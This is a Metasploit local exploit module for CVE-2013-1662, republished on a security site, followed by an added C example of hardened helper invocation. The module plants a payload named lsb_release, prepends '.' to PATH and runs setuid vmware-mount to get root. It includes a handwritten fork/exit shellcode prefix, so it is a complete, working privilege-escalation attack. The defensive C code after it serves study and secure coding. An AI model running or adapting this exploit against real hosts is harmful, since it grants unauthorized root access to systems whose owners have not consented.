VMWare Setuid vmware-mount Unsafe popen(3)
Source: metasploit.com  Author: egypt  Published: 2013-08-29
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit4 < Msf::Exploit::Local

	include Msf::Exploit::EXE
	include Msf::Post::Common
	include Msf::Post::File

	def initialize(info={})
		super( update_info( info, {
				'Name'          => 'VMWare Setuid vmware-mount Unsafe popen(3)',
				'Description'   => %q{
					VMWare Workstation (up to and including 9.0.2 build-1031769)
					and Player have a setuid executable called vmware-mount that
					invokes lsb_release in the PATH with popen(3). Since PATH is
					user-controlled, and the default system shell on
					Debian-derived distributions does not drop privs, we can put
					an arbitrary payload in an executable called lsb_release and
					have vmware-mount happily execute it as root for us.
				},
				'License'       => MSF_LICENSE,
				'Author'        =>
					[
						'Tavis Ormandy', # Vulnerability discovery and PoC
						'egypt' # Metasploit module
					],
				'Platform'      => [ 'linux' ],
				'Arch'          => ARCH_X86,
				'Targets'       =>
					[
						[ 'Automatic', { } ],
					],
				'DefaultOptions' => {
					"PrependSetresuid" => true,
					"PrependSetresgid" => true,
				},
				'Privileged'     => true,
				'DefaultTarget' => 0,
				'References' => [
					[ 'CVE', '2013-1662' ],
					[ 'OSVDB', '96588' ],
					[ 'BID', '61966'],
					[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
					[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
				],
				'DisclosureDate' => "Aug 22 2013"
			}
			))
		# Handled by ghetto hardcoding below.
		deregister_options("PrependFork")
	end

	def check
		if setuid?("/usr/bin/vmware-mount")
			CheckCode::Vulnerable
		else
			CheckCode::Safe
		end
	end

	def exploit
		unless check == CheckCode::Vulnerable
			fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
		end

		# Ghetto PrependFork action which is apparently only implemented for
		# Meterpreter.
		# XXX Put this in a mixin somewhere
		# if(fork()) exit(0);
		# 6A02              push byte +0x2
		# 58                pop eax
		# CD80              int 0x80 ; fork
		# 85C0              test eax,eax
		# 7406              jz 0xf
		# 31C0              xor eax,eax
		# B001              mov al,0x1
		# CD80              int 0x80 ; exit
		exe = generate_payload_exe(
			:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
		)
		write_file("lsb_release", exe)

		cmd_exec("chmod +x lsb_release")
		cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
		# Delete it here instead of using FileDropper because the original
		# session can clean it up
		cmd_exec("rm -f lsb_release")
	end

	def setuid?(remote_file)
		# Test the path that was passed in (the original hard-coded
		# /usr/bin/vmware-mount and ignored the argument). `test -u` succeeds
		# only when the file has the setuid bit set.
		!!(cmd_exec("test -u #{remote_file} && echo true").index "true")
	end

end
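The module's description reduces the bug to one pattern: a setuid binary uses popen(3) to run a helper that is located through the invoking user's PATH, and the shell that popen(3) goes through does not drop privileges. The C below is an added example, not part of the Metasploit module or of VMware's code, showing how a privileged program should invoke a helper instead: flag a PATH that contains a relative entry, replace the inherited environment with a fixed one, drop privileges irreversibly and verify the drop, and run the helper by absolute path through execv so that neither PATH nor /bin/sh is consulted. The SAFE_PATH value and the use of /bin/echo as a stand-in for lsb_release are assumptions made for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed search path used instead of the caller's PATH (assumed value). */
static const char SAFE_PATH[] = "/usr/sbin:/usr/bin:/sbin:/bin";

/* Return 1 if any PATH entry is relative: ".", "bin", an empty entry or a
 * trailing ":". Such an entry is what lets popen("lsb_release") in a setuid
 * binary run whatever the invoking user placed in that directory. */
int path_has_relative_entry(const char *path)
{
	if (path == NULL)
		return 0;
	for (;;) {
		const char *colon = strchr(path, ':');
		size_t len = colon ? (size_t)(colon - path) : strlen(path);
		if (len == 0 || path[0] != '/')
			return 1;
		if (colon == NULL)
			return 0;
		path = colon + 1;
	}
}

/* Replace the inherited PATH and IFS with known-good values. */
int install_safe_environment(void)
{
	if (setenv("PATH", SAFE_PATH, 1) != 0 || unsetenv("IFS") != 0)
		return -1;
	return 0;
}

/* Irreversibly drop to the invoking user's real uid/gid and verify the drop,
 * so a helper can never run with the setuid owner's identity. */
int drop_privileges_permanently(void)
{
	uid_t ruid = getuid();
	gid_t rgid = getgid();
	if (setresgid(rgid, rgid, rgid) != 0 || setresuid(ruid, ruid, ruid) != 0)
		return -1;
	if (geteuid() != ruid || getegid() != rgid)
		return -1;
	if (ruid != 0 && setuid(0) == 0) /* regaining root must now fail */
		return -1;
	return 0;
}

/* Run a helper by absolute path with an explicit argv: no shell, scrubbed
 * environment, privileges dropped in the child. Captures stdout (trailing
 * newline removed) into out. Returns the exit status, or -1 on error. */
int run_helper_capture(const char *abs_path, char *const argv[],
                       char *out, size_t outlen)
{
	int fds[2], status;
	size_t n = 0;
	ssize_t r;
	pid_t pid;

	if (abs_path == NULL || abs_path[0] != '/' || outlen == 0) {
		errno = EINVAL;
		return -1;
	}
	if (pipe(fds) != 0)
		return -1;
	if ((pid = fork()) < 0) {
		close(fds[0]);
		close(fds[1]);
		return -1;
	}
	if (pid == 0) {
		close(fds[0]);
		if (dup2(fds[1], STDOUT_FILENO) < 0)
			_exit(127);
		close(fds[1]);
		if (drop_privileges_permanently() != 0 || install_safe_environment() != 0)
			_exit(126);
		execv(abs_path, argv); /* no PATH search, no /bin/sh */
		_exit(127);
	}
	close(fds[1]);
	while (n + 1 < outlen && (r = read(fds[0], out + n, outlen - 1 - n)) > 0)
		n += (size_t)r;
	close(fds[0]);
	out[n] = '\0';
	while (n > 0 && out[n - 1] == '\n')
		out[--n] = '\0';
	if (waitpid(pid, &status, 0) < 0)
		return -1;
	return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The ordering inside the child matters: privileges are dropped and the environment is replaced before execv, so even a helper resolved by absolute path runs only with the invoking user's identity. Checking `geteuid()` after `setresuid()` and then confirming that `setuid(0)` fails catches the case where a drop silently did not take, which is the failure the module's `PrependSetresuid` default exploits from the other side. `path_has_relative_entry` is the audit-side counterpart: a setuid program that still has to honour PATH should at least refuse one containing `.`, an empty entry or a trailing colon.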
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved